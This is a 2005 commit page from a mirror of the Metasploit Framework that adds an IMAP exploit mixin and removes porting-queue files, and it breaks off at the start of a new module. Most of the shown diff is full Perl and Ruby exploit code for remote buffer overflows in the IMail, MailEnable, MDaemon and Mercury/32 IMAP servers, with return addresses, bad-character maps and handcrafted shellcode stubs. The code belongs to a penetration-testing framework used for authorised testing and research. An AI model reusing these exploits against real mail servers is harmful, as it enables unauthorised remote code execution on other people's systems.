infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Imap exploits 

Addition of MC as a common author
Added the IMAP mixin
Fixed bug in base64


git-svn-id: file:///home/svn/incoming/trunk@3172 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2005-12-05 05:00:27 +00:00
parent 86c5cf44c3
commit 6c2da4d313
15 changed files with 511 additions and 1090 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

241
dev/porting/queue/imail_imap_delete.rb
View File

@ -1,241 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'IMail IMAP4D Delete Overflow',
'Description' => %q{
This module exploits a buffer overflow in the 'DELETE'
command of the the IMail IMAP4D service. This vulnerability
can only be exploited with a valid username and password.
This flaw was patched in version 8.14.
},
'Author' => [ 'spoonm' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '11838'],
[ 'BID', '11675'],
[ 'MIL', '33'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 614,
'BadChars' => "\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x3a\x3b\x3c\x3d\x3e\x3f\x40\x5b\x5c\x5d\x5e\x5f\x60\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::imail_imap_delete;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = {
};
my $info = {
'Name' => 'IMail IMAP4D Delete Overflow',
'Version' => '$Revision$',
'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32'],
'Priv' => 1,
'AutoOpts' =>
{
'GETPCTYPE' => 'edx',
'EXITFUNC' => 'thread',
},
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
'USER' => [1, 'DATA', 'IMAP Username'],
'PASS' => [1, 'DATA', 'IMAP Password'],
},
'Payload' =>
{
# give some stack space, align esp
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
'Space' => 614,
'BadChars' =>
# hd's evil map
join('', map { $_=chr($_) } (0x00 .. 0x2f)).
join('', map { $_=chr($_) } (0x3a .. 0x40)).
join('', map { $_=chr($_) } (0x5b .. 0x60)).
join('', map { $_=chr($_) } (0x7b .. 0xff)),
'MinNops' => 0,
'MaxNops' => 0,
},
'Encoder' =>
{
'Keys' => ['+alphanum'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the 'DELETE' command of the
the IMail IMAP4D service. This vulnerability can only be exploited with
a valid username and password. This flaw was patched in version 8.14.
}),
'Refs' =>
[
['OSVDB', '11838'],
['BID', '11675'],
['MIL', '33'],
],
'Targets' =>
[
# alphanum rets :(, will look more into it later
['Windows XP sp0 comctl32.dll', 0x77364650],
],
'Keys' => ['imap'],
'DisclosureDate' => 'Nov 12 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $evil = "a001 LOGIN $user $pass\r\n";
$sock->Send($evil);
my $resp = $sock->Recv(-1);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}
if($resp !~ /^a001 OK LOGIN/) {
$self->PrintLine('Login error: ' . $resp);
return;
}
$self->PrintLine('[*] Logged in, sending overflow');
$evil = 'A683 DELETE ';
# shellcode
$evil .= $shellcode;
$evil .= 'B' x ($self->PayloadSpace - length($shellcode));
# $evil .= $self->_Stupid(614);
# jmp over code
$evil .= "\x74\x32\x75\x30";
# ret addr
$evil .= pack('V', $target->[1]);
# space
$evil .= Pex::Text::AlphaNumText(44);
# get eip code
$evil .=
"\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x4c\x5a\x6a\x31\x59".
"\x6b\x42\x34\x49\x30\x42\x4e\x42\x49\x75\x50\x4a\x4a\x52\x52\x59";
# alphanum encoded jmp back (edx context)
$evil .=
"\x6a\x6a\x58\x30\x42\x31\x50\x41\x42\x6b\x42\x41".
"\x7a\x42\x32\x42\x41\x32\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50".
"\x75\x4a\x49\x52\x7a\x71\x4a\x4d\x51\x7a\x4a\x6c\x55\x66\x62\x57".
"\x70\x55\x50\x4b\x4f\x6b\x52\x6a";
# run off the stack, so we don't kill our payload, or something...
$evil .= Pex::Text::AlphaNumText(600);
$evil .= "\r\n";
# hopefully this works...
$sock->Send($evil);
$sock->Send($evil);
my $resp = $sock->Recv(-1);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}
return;
}
1;
=end
end
end

195
dev/porting/queue/mailenable_imap.rb
View File

@ -1,195 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow',
'Description' => %q{
MailEnable's IMAP server contains a buffer overflow
vulnerability in the STATUS command. With proper
credentials, this could allow for the execution of arbitrary
code.
},
'Author' => [ 'y0 <y0@w00t-shell.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2005-2278'],
[ 'BID', '14243'],
[ 'NSS', '19193'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0a\x0d\x20",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, winnt, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Jul 13 2005',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mailenable_imap;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = {
};
my $info = {
'Name' => 'MailEnable Pro (1.54) IMAP STATUS Request Buffer Overflow',
'Version' => '$Revision$',
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
'USER' => [1, 'DATA', 'IMAP Username'],
'PASS' => [1, 'DATA', 'IMAP Password'],
},
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'Payload' =>
{
'Space' => 450,
'BadChars' => "\x00\x0a\x0d\x20",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
MailEnable's IMAP server contains a buffer overflow vulnerability
in the STATUS command. With proper credentials, this could allow
for the execution of arbitrary code.
}),
'Refs' =>
[
['CVE','2005-2278'],
['BID', '14243' ],
['NSS', '19193' ],
],
'Targets' =>
[
['MailEnable 1.54 Pro Universal', 9273, 0x1001c019], #MEAISP.DLL
['Windows XP Pro SP0/SP1 English', 9273, 0x71aa32ad ],
['Windows 2000 Pro English ALL', 9273, 0x75022ac4 ],
['Windows 2003 Server English', 9273, 0x7ffc0638 ],
],
'Keys' => ['imap'],
'DisclosureDate' => 'Jul 13 2005',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1, 3);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $sploit = "a001 LOGIN $user $pass\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1, 3);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}
if($resp !~ /^a001 OK LOGIN/) {
$self->PrintLine('Login error: ' . $resp);
return;
}
$self->PrintLine('[*] Logged in, sending overflow...');
my $splat = Pex::Text::UpperCaseText($target->[1]);
$sploit =
"a001 STATUS ". '".'. "\x00".
$splat. "\xeb\x06". pack('V', $target->[2]). $shellcode.
'"'. " (UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)". "\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1, 3);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}
return;
}
1;
=end
end
end

220
dev/porting/queue/mailenable_imap_w3c.rb
View File

@ -1,220 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is
not enabled by default and this exploit requires a valid
username and password to exploit the flaw. MailEnable
Professional version 1.6 and prior and MailEnable Enterprise
version 1.1 and prior are affected.
},
'Author' => [ 'y0 <y0@w00t-shell.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'BID', '15006'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32, winnt, win2000, winxp, win2003',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => '',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mailenable_imap_w3c;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = {
};
my $info = {
'Name' => 'MailEnable IMAPD W3C Logging Buffer Overflow',
'Version' => '$Revision$',
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003'],
'Priv' => 1,
'AutoOpts' =>
{
'EXITFUNC' => 'thread',
},
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
'USER' => [1, 'DATA', 'IMAP Username'],
'PASS' => [1, 'DATA', 'IMAP Password'],
},
'Payload' =>
{
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
'Space' => 600,
'BadChars' => "\x00\x0a\x0d\x20",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the W3C logging
functionality of the MailEnable IMAPD service. Logging is not
enabled by default and this exploit requires a valid username
and password to exploit the flaw. MailEnable Professional version
1.6 and prior and MailEnable Enterprise version 1.1 and prior are
affected.
}),
'Refs' =>
[
['BID', 15006],
],
'Targets' =>
[
['MailEnable 1.54 Pro Universal', 0x1001c019], #MEAISP.DLL
],
'Keys' => ['imap'],
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => 25,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("QUIT\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /MailEnable Service, Version: 0-1\.54/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $sploit = "a01 LOGIN $user $pass\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}
if($resp !~ /^a01 BAD LOGIN-/) {
$self->PrintLine('Login error: ' . $resp);
return;
}
$self->PrintLine('[*] Logged in, sending overflow');
my $splat = Pex::Text::AlphaNumText(6196);
$sploit =
"a01 SELECT ". $splat.
"\xeb\x06". pack('V', $target->[1]).
$shellcode. "\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}
return;
}
1;
=end
end
end

196
dev/porting/queue/mdaemon_imap_cram_md5.rb
View File

@ -1,196 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Description' => %q{
This module exploits a buffer overflow in the CRAM-MD5
authentication of the MDaemon IMAP service. This
vulnerability was discovered by Muts.
},
'Author' => [ 'anonymous' ],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '11838'],
[ 'CVE', '2004-1520'],
[ 'BID', '11675'],
[ 'MIL', '90'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00",
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Nov 12 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mdaemon_imap_cram_md5;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = { };
my $info = {
'Name' => 'Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow',
'Version' => '$Revision$',
'Authors' => [ 'anonymous' ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32'],
'Priv' => 1,
'AutoOpts' => { 'EXITFUNC' => 'process' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
},
'Payload' =>
{
'Prepend' => "\x81\xc4\x1f\xff\xff\xff\x44", # make stack happy
'Space' => 500,
'BadChars' => "\x00",
},
'Description' => Pex::Text::Freeform(qq{
This module exploits a buffer overflow in the CRAM-MD5 authentication of the
MDaemon IMAP service. This vulnerability was discovered by Muts.
}),
'Refs' =>
[
['OSVDB', '11838'],
['CVE', '2004-1520'],
['BID', '11675'],
['MIL', '90'],
],
'Targets' =>
[
['MDaemon IMAP 8.0.3 Windows XP SP2'],
],
'Keys' => ['mdaemon'],
'DisclosureDate' => 'Nov 12 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
if (! $self->InitNops(128)) {
$self->PrintLine("[*] Failed to initialize the NOP module.");
return;
}
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $req = "a001 authenticate cram-md5\r\n";
$sock->Send($req);
$self->PrintLine('[*] CRAM-MD5 authentication method asked');
$resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got CRAM-MD5 answer: ' . $resp);
# Magic no return-address exploitation ninjaness!
$req = "AAAA" . $shellcode . $self->MakeNops(258) . "\xe9\x05\xfd\xff\xff";
$req = Pex::Text::Base64Encode($req, '') . "\r\n";
$sock->Send($req);
$self->PrintLine('[*] CRAM-MD5 authentication with shellcode sent');
$resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got authentication reply: ' . $resp);
$req = "a002 LOGOUT\r\n";
$sock->Send($req);
$self->PrintLine('[*] Send LOGOUT to close the thread and trigger an exception');
$resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got LOGOUT reply: ' . $resp);
$self->PrintLine("[*] Overflow request sent, sleeping for one second");
select(undef, undef, undef, 1);
$self->Handler($sock);
return;
}
1;
=end
end
end

228
dev/porting/queue/mercury_imap.rb
View File

@ -1,228 +0,0 @@
require 'msf/core'
module Msf
class Exploits::Windows::XXX_CHANGEME_XXX < Msf::Exploit::Remote
include Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Description' => %q{
Mercury/32 v4.01a IMAP server is prone to a remotely
exploitable stack-based buffer overflow vulnerability. This
issue is due to a failure of the application to properly
bounds check user-supplied data prior to copying it to a
fixed size memory buffer.
},
'Author' => [ 'y0 <y0@w00t-shell.net>' ],
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1211'],
[ 'BID', '11775'],
[ 'NSS', '15867'],
[ 'MIL', '98'],
],
'Privileged' => true,
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x20",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
},
'Targets' =>
[
[
'Automatic Targetting',
{
'Platform' => 'win32',
'Ret' => 0x0,
},
],
],
'DisclosureDate' => 'Nov 29 2004',
'DefaultTarget' => 0))
end
def exploit
connect
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mercury_imap;
use strict;
use base 'Msf::Exploit';
use Msf::Socket::Tcp;
use Pex::Text;
my $advanced = {
};
my $info = {
'Name' => 'Mercury/32 v4.01a IMAP RENAME Buffer Overflow',
'Version' => '$Revision$',
'Authors' => [ 'y0 <y0 [at] w00t-shell.net>', ],
'Arch' => [ 'x86' ],
'OS' => [ 'win32'],
'Priv' => 1,
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 143],
'USER' => [1, 'DATA', 'IMAP Username'],
'PASS' => [1, 'DATA', 'IMAP Password'],
},
'AutoOpts' => { 'EXITFUNC' => 'process' },
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x0a\x0d\x20",
'Prepend' => "\x81\xec\x96\x40\x00\x00\x66\x81\xe4\xf0\xff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
Mercury/32 v4.01a IMAP server is prone to a remotely exploitable
stack-based buffer overflow vulnerability. This issue is due
to a failure of the application to properly bounds check
user-supplied data prior to copying it to a fixed size memory buffer.
}),
'Refs' =>
[
['CVE','2004-1211'],
['BID', '11775'],
['NSS', '15867'],
['MIL', '98'],
],
'Targets' =>
[
['Windows 2000 SP4 English', 0x7c2f8498 ],
['Windows 2000 SP4 English', 0x7846107b],
['Windows XP Pro SP0 English', 0x77dc0df0 ],
['Windows XP Pro SP1 English', 0x77e53877 ],
],
'Keys' => ['imap'],
'DisclosureDate' => 'Nov 29 2004',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Check {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return $self->CheckCode('Connect');
}
$s->Send("a001 LOGOUT\r\n");
my $res = $s->Recv(-1, 20);
$s->Close();
if ($res !~ /Mercury\/32 v4\.01a/) {
$self->PrintLine("[*] This server does not appear to be vulnerable.");
return $self->CheckCode('Safe');
}
$self->PrintLine("[*] Vulnerable installation detected :-)");
return $self->CheckCode('Detected');
}
sub Exploit {
my $self = shift;
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $targetIndex = $self->GetVar('TARGET');
my $user = $self->GetVar('USER');
my $pass = $self->GetVar('PASS');
my $encodedPayload = $self->GetVar('EncodedPayload');
my $shellcode = $encodedPayload->Payload;
my $target = $self->Targets->[$targetIndex];
my $sock = Msf::Socket::Tcp->new(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
);
if($sock->IsError) {
$self->PrintLine('Error creating socket: ' . $sock->GetError);
return;
}
my $resp = $sock->Recv(-1);
chomp($resp);
$self->PrintLine('[*] Got Banner: ' . $resp);
my $sploit = "a001 LOGIN $user $pass\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if($sock->IsError) {
$self->PrintLine('Socket error: ' . $sock->GetError);
return;
}
if($resp !~ /^a001 OK LOGIN/) {
$self->PrintLine('Login error: ' . $resp);
return;
}
$self->PrintLine('[*] Logged in, sending overflow...');
my $splat = Pex::Text::UpperCaseText(260);
$sploit =
"a001 RENAME ". $splat. pack('V', $target->[1]).
$shellcode. "\r\n";
$sock->Send($sploit);
my $resp = $sock->Recv(-1);
if(length($resp)) {
$self->PrintLine('[*] Got response, bad: ' . $resp);
}
return;
}
1;
=end
end
end

3
lib/msf/core/exploit.rb
View File

@ -214,7 +214,8 @@ class Exploit < Msf::Module
require 'msf/core/exploit/mssql' require 'msf/core/exploit/mssql'
require 'msf/core/exploit/arkeia' require 'msf/core/exploit/arkeia'
require 'msf/core/exploit/ndmp' require 'msf/core/exploit/ndmp'
require 'msf/core/exploit/imap'
# #
# Creates an instance of the exploit module. Mad skillz. # Creates an instance of the exploit module. Mad skillz.
# #

27
lib/msf/core/exploit/ftp.rb
View File

@ -54,18 +54,29 @@ module Exploit::Remote::Ftp
def connect_login(global = true) def connect_login(global = true)
ftpsock = connect(global) ftpsock = connect(global)
# If the user supplied a username, send that if (not (user and pass))
if (user) print_status("No username and password were supplied, unable to login")
print_status("Sending username #{user}...") return false
end
res = send_user(user, ftpsock) print_status("Authenticating as #{user} with password #{pass}...")
res = send_user(user, ftpsock)
if (res !~ /^(331|2)/)
print_status("The server rejected our username")
return false
end
# If the user supplied a password, send that if (pass)
if (pass) print_status("Sending password...")
print_status("Sending password...") res = send_pass(pass, ftpsock)
res = send_pass(pass, ftpsock) if (res !~ /^2/)
print_status("The server rejected our password")
return false
end end
end end
return true
end end
# #

115
lib/msf/core/exploit/imap.rb Normal file
View File

@ -0,0 +1,115 @@
module Msf
require 'msf/core/exploit/tcp'
###
#
# This module exposes methods that may be useful to exploits that deal with
# servers that speak the IMAP protocol.
#
###
module Exploit::Remote::Imap
include Exploit::Remote::Tcp
#
# Creates an instance of an FTP exploit module.
#
def initialize(info = {})
super
# Register the options that all FTP exploits may make use of.
register_options(
[
Opt::RHOST,
Opt::RPORT(143),
OptString.new('USER', [ false, 'The username to authenticate as']),
OptString.new('PASS', [ false, 'The password for the specified username'])
], Msf::Exploit::Remote::Ftp)
end
#
# This method establishes a IMAP connection to host and port specified by
# the RHOST and RPORT options, respectively. After connecting, the banner
# message is read in and stored in the 'banner' attribute.
#
def connect(global = true)
print_status("Connecting to IMAP server #{rhost}:#{rport}...")
fd = super
# Wait for a banner to arrive...
self.banner = fd.get_once
print_status("Connected to target IMAP server.")
# Return the file descriptor to the caller
fd
end
#
# Connect and login to the remote IMAP server using the credentials
# that have been supplied in the exploit options.
#
def connect_login(global = true)
ftpsock = connect(global)
if (not (user and pass))
print_status("No username and password were supplied, unable to login")
return false
end
print_status("Authenticating as #{user} with password #{pass}...")
raw_send_recv("a001 LOGIN #{user} #{pass}\r\n")
res = sock.get_once
if (res !~ /^a001 OK/)
print_status("Authentication failed")
return false
end
return true
end
#
# This method transmits an IMAP command and waits for a response. If one is
# received, it is returned to the caller.
#
def raw_send_recv(cmd, nsock = self.sock)
nsock.put(cmd)
nsock.get_once
end
##
#
# Wrappers for getters
#
##
#
# Returns the user string from the 'USER' option.
#
def user
datastore['USER']
end
#
# Returns the user string from the 'PASS' option.
#
def pass
datastore['PASS']
end
protected
#
# This attribute holds the banner that was read in after a successful call
# to connect or connect_login.
#
attr_accessor :banner
end
end

1
lib/msf/core/module/author.rb
View File

@ -19,6 +19,7 @@ class Msf::Module::Author
'optyx' => 'optyx@hatesemail.com', 'optyx' => 'optyx@hatesemail.com',
'anonymous' => 'anonymous-contributor@metasploit.com', 'anonymous' => 'anonymous-contributor@metasploit.com',
'stinko' => 'vinnie@metasploit.com', 'stinko' => 'vinnie@metasploit.com',
'MC' => 'y0@w00t-shell.net',
} }

2
lib/rex/text.rb
View File

@ -170,7 +170,7 @@ module Text
# Base64 encoder # Base64 encoder
# #
def self.encode_base64(str) def self.encode_base64(str)
Base64.encode64(str) Base64.encode64(str).chomp
end end
# #

86
modules/exploits/windows/imap/imail_delete.rb Normal file
View File

@ -0,0 +1,86 @@
require 'msf/core'
module Msf
